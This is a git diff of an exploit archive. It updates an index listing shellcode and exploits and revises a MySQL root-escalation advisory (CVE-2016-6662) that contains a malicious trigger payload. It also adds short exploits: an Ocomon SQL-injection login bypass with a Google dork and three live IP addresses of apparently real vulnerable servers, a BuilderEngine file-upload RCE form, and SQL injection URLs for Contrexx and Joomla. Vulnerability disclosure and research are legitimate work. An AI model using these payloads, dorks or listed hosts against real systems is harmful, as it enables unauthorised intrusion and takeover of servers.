@ -35263,10 +35273,10 @@ id,file,description,date,author,platform,type,port
38928,platforms/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - Cross-Site Request Forgery",2015-12-10,KnocKout,php,webapps,80
38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <= 7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443
38930,platforms/multiple/dos/38930.txt,"Rar - CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",multiple,dos,0
38931,platforms/multiple/dos/38931.txt,"Avast - OOB Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos,0
38932,platforms/multiple/dos/38932.txt,"Avast - JetDb::IsExploited4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0
38933,platforms/multiple/dos/38933.txt,"Avast - Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0
38934,platforms/windows/dos/38934.txt,"Avast - Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0
38931,platforms/multiple/dos/38931.txt,"Avast! - OOB Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos,0
38932,platforms/multiple/dos/38932.txt,"Avast! - JetDb::IsExploited4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0
38933,platforms/multiple/dos/38933.txt,"Avast! - Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0
38934,platforms/windows/dos/38934.txt,"Avast! - Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0
38935,platforms/asp/webapps/38935.txt,"CMS Afroditi - 'id' Parameter SQL Injection",2013-12-30,"projectzero labs",asp,webapps,0
38936,platforms/php/webapps/38936.txt,"WordPress Plugin Advanced Dewplayer - 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0
38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API - Local Information Disclosure",2014-01-01,anonymous,linux,local,0
@ -35448,14 +35458,14 @@ id,file,description,date,author,platform,type,port
39122,platforms/windows/local/39122.py,"KiTTY Portable 0.65.0.2p (Windows 8.1 / Windows 10) - Local kitty.ini Overflow",2015-12-29,"Guillaume Kaddouch",windows,local,0
39124,platforms/php/webapps/39124.txt,"MeiuPic - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0
39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security - Remote Denial of Service",2014-03-20,CXsecurity,windows,dos,0
39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0
39126,platforms/php/webapps/39126.txt,"BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0
39127,platforms/cgi/webapps/39127.txt,"innoEDIT - 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0
39128,platforms/php/webapps/39128.txt,"Jorjweb - 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0
39129,platforms/php/webapps/39129.txt,"qEngine - 'run' Parameter Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0
39130,platforms/cgi/webapps/39130.txt,"DotItYourself - 'dot-it-yourself.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0
39131,platforms/cgi/webapps/39131.txt,"Beheer Systeem - 'pbs.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0
39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0
39133,platforms/php/webapps/39133.php,"Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80
39133,platforms/php/webapps/39133.php,"Wordpress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80
39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Privilege Escalation",2015-12-30,"Larry W. Cashdollar",linux,local,0
39135,platforms/php/webapps/39135.php,"WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload",2014-03-23,"CaFc Versace",php,webapps,0
39136,platforms/php/webapps/39136.txt,"Symphony 2.2.4 - Cross-Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps,0
@ -35646,7 +35656,7 @@ id,file,description,date,author,platform,type,port
39325,platforms/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
39326,platforms/multiple/dos/39326.txt,"Wireshark - nettrace_3gpp_32_423_file_open Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
39327,platforms/multiple/dos/39327.txt,"Wireshark - dissect_ber_constrained_bitstring Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.52 / 5.6.33 / 5.7.15 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306
40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306
39328,platforms/android/remote/39328.rb,"Android ADB Debug Server - Remote Payload Execution (Metasploit)",2016-01-26,Metasploit,android,remote,5555
39329,platforms/windows/dos/39329.py,"InfraRecorder - '.m3u' File Buffer Overflow",2014-05-25,"Osanda Malith",windows,dos,0
39330,platforms/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0
@ -35834,7 +35844,7 @@ id,file,description,date,author,platform,type,port
39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0
39526,platforms/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,php,webapps,80
39529,platforms/multiple/dos/39529.txt,"Wireshark - wtap_optionblock_free Use-After-Free",2016-03-07,"Google Security Research",multiple,dos,0
39530,platforms/windows/dos/39530.txt,"Avast - Authenticode Parsing Memory Corruption",2016-03-07,"Google Security Research",windows,dos,0
39530,platforms/windows/dos/39530.txt,"Avast! - Authenticode Parsing Memory Corruption",2016-03-07,"Google Security Research",windows,dos,0
39531,platforms/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",windows,local,0
39533,platforms/windows/dos/39533.txt,"Adobe Digital Editions 4.5.0 - '.pdf' Critical Memory Corruption",2016-03-09,"Pier-Luc Maltais",windows,dos,0
39534,platforms/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",php,webapps,80
@ -36045,7 +36055,7 @@ id,file,description,date,author,platform,type,port
39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind 1472/TCP Shellcode (IPv6) (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39759,platforms/php/webapps/39759.txt,"Alibaba Clone B2B Script - Admin Authentication Bypass",2016-05-04,"Meisam Monsef",php,webapps,80
39760,platforms/php/webapps/39760.txt,"CMS Made Simple < 2.1.3 / < 1.12.1 - Web Server Cache Poisoning",2016-05-04,"Mickaël Walter",php,webapps,80
39761,platforms/php/webapps/39761.txt,"Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",php,webapps,80
39761,platforms/php/webapps/39761.txt,"Wordpress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",php,webapps,80
39762,platforms/cgi/webapps/39762.txt,"NetCommWireless HSPA 3G10WVE Wireless Router - Multiple Vulnerabilities",2016-05-04,"Bhadresh Patel",cgi,webapps,80
39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP Shellcode (IPv6) (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow",2016-05-04,"Juan Sacco",linux,local,0
@ -36129,7 +36139,7 @@ id,file,description,date,author,platform,type,port
39845,platforms/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Privilege Escalation",2016-05-23,LiquidWorm,windows,local,0
39846,platforms/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,windows,dos,0
39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80
39848,platforms/php/webapps/39848.py,"Wordpress Plugin Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80
39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure (via XXE Injection)",2016-05-24,"Mehmet Ince",asp,webapps,80
39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
@ -36253,7 +36263,7 @@ id,file,description,date,author,platform,type,port
40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local,0
39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
39977,platforms/php/webapps/39977.txt,"Joomla! Component BT Media (com_bt_media) - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
39978,platforms/php/webapps/39978.php,"Wordpress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
39979,platforms/windows/shellcode/39979.c,"Windows XP < 10 - Download & Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0
39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0
39981,platforms/php/webapps/39981.html,"Airia - Cross-Site Request Forgery (Add Content)",2016-06-20,HaHwul,php,webapps,80
@ -36512,6 +36522,7 @@ id,file,description,date,author,platform,type,port
40282,platforms/cgi/webapps/40282.txt,"JVC IP-Camera VN-T216VPRU - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0
40283,platforms/cgi/webapps/40283.txt,"Honeywell IP-Camera HICC-1100PT - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0
40284,platforms/hardware/webapps/40284.txt,"VideoIQ Camera - Local File Disclosure",2016-08-22,"Yakir Wizman",hardware,webapps,0
40285,platforms/php/webapps/40285.txt,"Ocomon 2.0 - SQL Injection",2016-08-22,"Jonatas Fil",php,webapps,80
40286,platforms/java/webapps/40286.txt,"Sakai 10.7 - Multiple Vulnerabilities",2016-08-22,LiquidWorm,java,webapps,0
40288,platforms/php/webapps/40288.txt,"WordPress 4.5.3 - Directory Traversal / Denial of Service",2016-08-22,"Yorick Koster",php,webapps,80
40289,platforms/hardware/dos/40289.txt,"ObiHai ObiPhone 1032/1062 < 5-0-0-3497 - Multiple Vulnerabilities",2016-08-22,"David Tomaschik",hardware,dos,0

Can't render this file because it is too large.

187
platforms/linux/local/40360.txt
View file

@ -1,3 +1,5 @@
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
@ -5,6 +7,8 @@
- CVE-2016-6662
- Release date: 12.09.2016
- Last updated: 23.09.2016
- Revision: 3
- Severity: Critical
=============================================
@ -12,9 +16,9 @@
I. VULNERABILITY
-------------------------
MySQL <= 5.7.15 Remote Root Code Execution / Privilege Escalation (0day)
5.6.33
5.5.52
MySQL <= 5.7.14 Remote Root Code Execution / Privilege Escalation (0day)
5.6.32
5.5.51
MySQL clones are also affected, including:
@ -63,8 +67,6 @@ A successful exploitation could allow attackers to execute arbitrary code with
root privileges which would then allow them to fully compromise the server on
which an affected version of MySQL is running.
Official patches for the vulnerability are not available at this time for Oracle
MySQL server.
The vulnerability can be exploited even if security modules SELinux and AppArmor
are installed with default active policies for MySQL service on major Linux
distributions.
@ -160,13 +162,16 @@ in a '[mysqld]' or '[mysqld_safe]' section.
If an attacker managed to inject a path to their malicious library within the
config, they would be able to preload an arbitrary library and thus execute
arbitrary code with root privileges when MySQL service is restarted (manually,
via a system update, package update, system reboot etc.)
arbitrary code with root privileges when MySQL service is restarted.
The restart could be triggered manually, via a system update, package update
(including an update of dependencies), system reboot etc.).
Attackers might also be able to speed up the server restart remotely by issuing
a SHUTDOWN SQL statement or 'shutdown' command via mysqladmin.
In 2003 a vulnerability was disclosed in MySQL versions before 3.23.55 that
allowed users to create mysql config files with a simple statement:
SELECT * INFO OUTFILE '/var/lib/mysql/my.cnf'
SELECT * INTO OUTFILE '/var/lib/mysql/my.cnf'
The issue was fixed by refusing to load config files with world-writable
permissions as these are the default permissions applied to files created
@ -183,11 +188,12 @@ successfully bypass current restrictions by abusing MySQL logging functions
(available in every MySQL install by default) to achieve the following:
1) Inject malicious configuration into existing MySQL configuration files on
systems with weak/improper permissions (configs owned by/writable by mysql user).
systems with weak/improper permissions (configs owned by/writable by mysql user)
(SCENARIO 1).
2) Create new configuration files within a MySQL data directory (writable
by MySQL by default) on _default_ MySQL installs without the need to rely on
improper config permisions.
improper config permissions (SCENARIO 2).
3) Attackers with only SELECT/FILE permissions can gain access to logging
functions (normally only available to MySQL admin users) on all of the
@ -195,12 +201,59 @@ _default_ MySQL installations and thus be in position to add/modify MySQL
config files.
Update (16/09/2016):
The proof of concept details below should be read closely as there have been
some misconceptions noticed on some security forums which incorrectly try
to lessen the severity of this vulnerability due to a lack of correct
understanding of the issues presented in this advisory.
It should be noted that:
* SCENARIO 2 (point 2 above) is _independent_ of SCENARIO 1 (point 1 above).
I.e the config injection vulnerability which ultimately leads to loading
arbitrary malicious shared libraries CAN be exploited EVEN if there are NO
my.cnf config files with insecure permissions available on the system.
In other words, weak permissions are NOT a requirement for exploitation, and
the vulnerability CAN be exploit on affected DEFAULT PerconaDB/MariaDB/MySQL
installations with CORRECT permissions set on ALL my.cnf files available on
the system by default.
The SCENARIO 1 has only been presented as it makes the exploit code much
simpler and allows to explain the logging abuse/config injection vulnerability
without exposing default installations (SCENARIO 2) to an immediate risk.
* The researcher has created a private working PoC that has not been shared
publicly which CAN successfully exploit SCENARIO 2 (default setup/no incorrect
permissions on any of the default my.cnf config files). As noted both in the
section below as well as in the current PoC exploit's comments, the current
PoC is limited. It has been purposefully limited to protect immediate
exploitation of default installations (no incorrect perms on my.cnf) and give
users time to react to the vulnerability.
* A successful exploitation of SCENARIO 2 (no my.cnf available with weak perms)
leading to root privilege escalation/code execution can _ALSO_ (however is NOT a
requirement) be achieved by means of a (separate) vulnerability: CVE-2016-6663.
PoC has been created by the author of this advisory but not released publicly.
* The logging facility CAN be accessed by standard users with SELECT/FILE
privileges only. I.e SUPER privilege is NOT required to create malicious triggers
which contain the malicious payload that grants the attacker access to the
logging facility DESPITE the LACK of administrative privileges.
This has been explained in the section below (see point 3 in the section below)
and proven in the current PoC in this advisory and can also be observed in the
replication steps (see VI. section) that show the attacker database account
permissions (the attacker DB account is NOT assigned SUPER permissions).
* The exploitation requires a restart that could happen via a number of ways.
Attackers might also be able to speed up the server restart remotely by issuing
a SHUTDOWN SQL statement or 'shutdown' command via mysqladmin.
V. PROOF OF CONCEPT
-------------------------
1) Inject malicious configuration into existing MySQL configuration files on
systems with weak/improper permissions (configs owned by/writable by mysql user).
(SCENARIO 1)
~~~~~~~~~~~~~~~~~~~~~~~~~
MySQL configuration files are loaded from all supported locations and processed
@ -243,7 +296,7 @@ need only read access:
shell> chown mysql /etc/my.cnf"
Moreover, there are also MySQL recipes for installation automatation software
Moreover, there are also MySQL recipes for installation automation software
such as Chef that also provide users with vulnerable permissions on my.cnf
config files.
@ -315,15 +368,16 @@ mysqld_safe will read the shared library path correctly and add it to
the LD_PRELOAD environment variable before the startup of mysqld daemon.
The preloaded library can then hook the libc fopen() calls and clean up
the config before it is ever processed by mysqld daemon in order for it
to start up successfully.
to start up successfully so that the compromise goes unnoticed by the
system administrators etc.
~~~~~~~~~~~~~~~~~~~~~~~~~
2) Create new configuration files within a MySQL data directory (writable
by MySQL by default) on _default_ MySQL installs without the need to rely on
improper config permisions.
improper config permissions.
(SCENARIO 2)
Analysis of the mysqld_safe script has shown that in addition to the
@ -424,14 +478,15 @@ a valid [section] header with the message:
error: Found option without preceding group in config file: /var/lib/mysql/my.cnf at line: 1
Fatal error in defaults handling. Program aborted
Further testing has however proved that it is possible to bypass this security
restriction as well but these will not be included in this advisory for the
time being.
Further testing has however proven that IT IS possible to bypass this security
restriction as well but this will not be included in this advisory/PoC for the
time being.
It is worth to note that attackers could use one of the other vulnerabilities discovered
by the author of this advisory which has been assigned a CVEID of CVE-2016-6662 and is
pending disclosure. The undisclosed vulnerability makes it easy for certain attackers to
create /var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege
It is worth to note that attackers could use one of the other vulnerabilities
discovered by the author of this advisory which has been assigned a CVEID of
CVE-2016-6663 and is pending disclosure.
The undisclosed vulnerability makes it easy for certain attackers to create
/var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege
requirement.
@ -447,7 +502,8 @@ If attackers do not have administrative rights required to access logging settin
and only have standard user privileges with the addition of FILE privilege then
they could still gain the ability to write to / modify configuration files.
This could be achieved by writing a malicious trigger payload:
This could be achieved by writing a malicious trigger payload - a trigger
definition that is an _equivalent_ to the following statement:
CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf
AFTER INSERT
@ -464,20 +520,26 @@ malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so'
set global general_log = off;
END;
into a trigger definition/configuration file (.TRG) of an actively used table
('active_table') with the use of a statement similar to:
into a trigger file of an actively used table ('active_table') with the
use of a statement similar to:
SELECT '...trigger_definition...' INTO DUMPFILE /var/lib/mysql/activedb/active_table.TRG'
SELECT '....trigger_code...' INTO DUMPFILE /var/lib/mysql/activedb/active_table.TRG'
Note that _only_ the above SELECT statement is required to write out the trigger
definition by abusing the power of FILE privilege.
The CREATE TRIGGER statement is _never_ executed and is not necessary. This
means that SUPER privilege is not necessary either. See the exploit code for
details.
Such trigger will be loaded when tables get flushed. From this point on
whenever an INSERT statement is invoked on the table, e.g:
INSERT INTO `active_table` VALUES('xyz');
The trigger's code will be executed with mysql root user privileges (see
'definer' above) and will thus let attacker to modify the general_log settings
despite the lack of administrative privileges on their standard account.
The trigger's code will be executed with mysql root/admin privileges (notice
'DEFINER' above) and will thus let attacker to modify the general_log settings
despite the lack of administrative/SUPER privileges through their user account
(with SELECT/FILE privileges only).
------------------
@ -607,8 +669,9 @@ with open(hookandrootlib_path, 'rb') as f:
content = f.read()
hookandrootlib_hex = binascii.hexlify(content)
# Trigger payload that will elevate user privileges and sucessfully execute SET GLOBAL GENERAL_LOG
# Decoded payload (paths may differ):
# Trigger payload that will elevate user privileges and successfully execute SET GLOBAL GENERAL_LOG
# in spite of the lack of SUPER/admin privileges (attacker only needs SELECT/FILE privileges)
# Decoded payload (paths may differ) will look similar to:
"""
DELIMITER //
CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf
@ -905,6 +968,9 @@ For example, /etc/mysql/my.cnf on Debian:
3. Run the exploit as the attacker and restart mysql when exploit
is done.
Note that attackers could be able to force this step remotely by
issuing a remote SHUTDOWN command/SQL statement.
As attacker:
~~~~~~~~
@ -1002,7 +1068,6 @@ exit
VII. BUSINESS IMPACT
-------------------------
@ -1020,7 +1085,12 @@ Successful exploitation could gain a attacker a remote shell with root privilege
which would allow them to fully compromise the remote system.
If exploited, the malicious code would run as soon as MySQL daemon gets
restarted. MySQL service restart could happen for a number of reasons.
restarted.
As mentioned, the restart could be triggered manually, via a system update,
package update (including an update of dependencies), system reboot etc.).
Attackers might also be able to speed up the server restart remotely by issuing
a SHUTDOWN SQL statement or 'shutdown' command via mysqladmin.
VIII. SYSTEMS AFFECTED
@ -1032,7 +1102,8 @@ of this advisory.
Some systems run MySQL via Systemd and provide direct startup path to mysqld
daemon instead of using mysqld_safe wrapper script. These systems however are
also at risk as mysqld_safe may be called on update by the installation scripts
or some other system services.
or some other system services. It could also be triggered manually by
administrators running mysqld_safe as a habit.
Because the exploit only accesses files normally used by MySQL server (
such as the config), and the injected library is preloaded by mysqld_safe startup
@ -1048,16 +1119,16 @@ The vulnerability was reported to Oracle on 29th of July 2016 and triaged
by the security team.
It was also reported to the other affected vendors including PerconaDB and MariaDB.
The vulnerabilities were patched by PerconaDB and MariaDB vendors by the end of
30th of August.
During the course of the patching by these vendors the patches went into
The vulnerabilities were patched by PerconaDB and MariaDB vendors in all branches
by 30th of August.
During the course of the patching process by these vendors the patches went into
public repositories and the fixed security issues were also mentioned in the
new releases which could be noticed by malicious attackers.
As over 40 days have passed since reporting the issues and patches were already
mentioned publicly, a decision was made to start disclosing vulnerabilities
(with limited PoC) to inform users about the risks before the vendor's next
CPU update that only happens at the end of October.
mentioned publicly (by Percona and MariaDB) , a decision was made to start
disclosing vulnerabilities (with limited PoC) to inform users about the risks
before the vendor's next CPU update (scheduled for 18th of October).
No official patches or mitigations are available at this time from the vendor.
As temporary mitigations, users should ensure that no mysql config files are
@ -1066,6 +1137,23 @@ use.
These are by no means a complete solution and users should apply official vendor
patches as soon as they become available.
Update (16/09/2016):
It has been found that the vendor silently (i.e. without notifing the researcher
via a direct communication despite the ongoing private communication via email,
nor via releasing an immediate public Security Alert to publicly announce the
critical fixes) released security patches for the CVE-2016-6662 vulnerability in
the following releases:
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-15.html
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-33.html
https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-52.html
which changes the vulnerable/exploitable version list to the following:
MySQL <= 5.7.14
5.6.32
5.5.51
X. REFERENCES
-------------------------
@ -1079,6 +1167,17 @@ http://legalhackers.com/exploits/0ldSQL_MySQL_RCE_exploit.py
http://legalhackers.com/exploits/mysql_hookandroot_lib.c
MySQL releases containing security fixes:
https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-52.html
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-33.html
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-15.html
which can be downloaded from:
http://dev.mysql.com/downloads/mysql/
https://mariadb.org/mariadb-server-versions-remote-root-code-execution-vulnerability-cve-2016-6662/
https://security-tracker.debian.org/tracker/CVE-2016-6662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6662
The old vulnerability fixed in MySQL version 3.23.55:
@ -1096,10 +1195,18 @@ XII. REVISION HISTORY
-------------------------
12.09.2016 - Advisory released publicly as 0day
16.09.2016 - Updated the IV section with important notes to clarify
misconceptions observed on some security forums.
16.09.2016 - Updated the IX section to add information about fixed releases
along with I and II sections to reflect these.
22.09.2016 - Updated V. 3) section and fixed some typos.
23.09.2016 - Added notes about potential use of SHUTDOWN command/SQL statement
that remote attackers could use in order to speed up the restart.
XIII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
responsibility for any damage caused by the use or misuse of this information.

58
platforms/php/webapps/40285.txt Executable file
View file

@ -0,0 +1,58 @@
# Exploit Title: Ocomon 2.0: Acess administrative Bypass / Multiple Sql
Injection
# Google Dork: inurl:ocomon/index.php or intitle:Ocomon 2.0-RC6
# Date: 2016.08.18
# Exploit Author: Jonatas Fil a.k.a pwx
# Vendor Homepage: ninj4c0d3r.github.io
# Version: Latest 2.0RC6
# Tested on: Linux And Windows
# CVE : CVE-2005-4664
\xDetails:
========================================
[Software]
- Ocomon
[Bug Summary]
- Multiple SQL Injection (SQLi)
[Impact]
- High
[Affected Version]
- Latest 2.0RC6
- Prior versions may also be affected
=========================================
\x01- Search by dork in google
Dorks:
inurl:ocomon/index.php or intitle:Ocomon 2.0-RC6
\x02 - After, To find the victim, open the inspect element in admin page.
\x03 - Look for the parameter: <body>: <table>: <tbody>: <tr>, and return
valida() and delete the content, leaving blank.
\x04 - After, Sign in using: "admin'or'" For Username and Password.
\x05 - Finish!, You get acess in administrative page to the system.
--------------------------------------------
\xDEMO:
http://200.66.111.38/ocomon/index.php
http://191.241.229.210:8080/ocomon/index.php
http://191.241.229.210:8081/ocomon/index.php
---------------------------------------------
References:
https://packetstormsecurity.com/files/100568/Ocomon-2.0RC6-SQL-Injection.html
http://www.cvedetails.com/cve/CVE-2005-4664/
http://www.securityfocus.com/bid/15386/exploit

11
platforms/php/webapps/40366.txt Executable file
View file

@ -0,0 +1,11 @@
# Exploit Title: Contrexx CMS:egov moudle SQL injection
# Google Dork: inurl:?section=egov
# Date: 12/9/2016
# Exploit Author: hamidreza borghei
# Software Link: https://www.cloudrexx.com/de/index.php?section=downloads&cmd=7&category=8
# Version: 1.0.0
# Tested on: linux
sql injection in id parameter:
http://server/index.php?section=egov&cmd=details&id=[sql query]

28
platforms/php/webapps/40390.php Executable file
View file

@ -0,0 +1,28 @@
<!--
# Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
# Date: 18/09/2016
# Exploit Author: metanubix
# Vendor Homepage: http://builderengine.org/
# Software Link: http://builderengine.org/page-cms-download.html
# Version: 3.5.0
# Tested on: Kali Linux 2.0 64 bit
# Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"
1) Unauthenticated Unrestricted File Upload:
POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/
Vulnerable Parameter: files[]
We can upload test.php and reach the file via the following link:
/files/test.php
-->
<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>

23
platforms/php/webapps/40423.txt Executable file
View file

@ -0,0 +1,23 @@
######################
# Exploit Title : Joomla Event Booking Component - SQL Injection
# Exploit Author : Persian Hack Team
# Homepage : http://persian-team.ir
# Vendor Homepage : http://extensions.joomla.org/extension/event-booking
# Category [ Webapps ]
# Tested on [ Win ]
# Version : 2.10.1
# Date 2016/09/25
######################
#
# PoC
# => Sql Injection :
# Date Parameter Vulnerable To SQL
# Demo :
# http://server/index.php?option=com_eventbooking&view=calendar&layout=weekly&date={SQL}&Itemid=354
#
# Video : http://persian-team.ir/showthread.php?tid=160&pid=291
######################
# Discovered by : Mojtaba MobhaM
# B3li3v3 M3 I will n3v3r St0p
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members
######################

2
platforms/windows/local/18500.py
View file

@ -5,7 +5,7 @@
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com #
# http://www.fuzzysecurity.com/exploits/8.html #
# OS: WinXP PRO SP3 #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications/ #
# Software: https://www.exploit-db.com/apps/ #
# f248239d09b37400e8269cb1347c240e-BladeAPIMonitor-3.6.9.2.Setup.exe #
# #
# Unicode Exploit by FullMetalFouad - http://www.exploit-db.com/exploits/18349/ #

4
platforms/windows/local/19776.pl
View file

@ -5,8 +5,8 @@
# Author: b33f - http://www.fuzzysecurity.com/ #
# OS: Windows XP SP1 #
# DOS POC: C4SS!0 G0M3S => http://www.exploit-db.com/exploits/17512/ #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/ #
# applications/decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe #
# Software: https://www.exploit-db.com/apps/ #
# decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe #
#---------------------------------------------------------------------------#
# Sorry for reinventing the wheel but learning about heap-overflows #
# requires you to take a step back and roll with the punches not unlike #

2
platforms/windows/local/32358.pl
View file

@ -2,7 +2,7 @@
# Date: 18 March 2014
# Exploit Author: Ayman Sagy <aymansagy [at] gmail.com>
# Vendor Homepage: http://ibiblio.org/mp3info/
# Software Link: http://www.exploit-db.com/wp-content/themes/exploit/applications/cb7b619a10a40aaac2113b87bb2b2ea2-mp3info-0.8.5a.tgz
# Software Link: https://www.exploit-db.com/apps/cb7b619a10a40aaac2113b87bb2b2ea2-mp3info-0.8.5a.tgz
# Version: MP3Info 0.8.5
# Tested on: Windows 7 Ultimate 64 and 32 bit
# CVE : 2006-2465

43
platforms/windows/local/40422.txt Executable file
View file

@ -0,0 +1,43 @@
# Exploit Title: NetDrive 2.6.12 Unquoted Service Path Elevation of Privilege
# Date: 24/09/2016
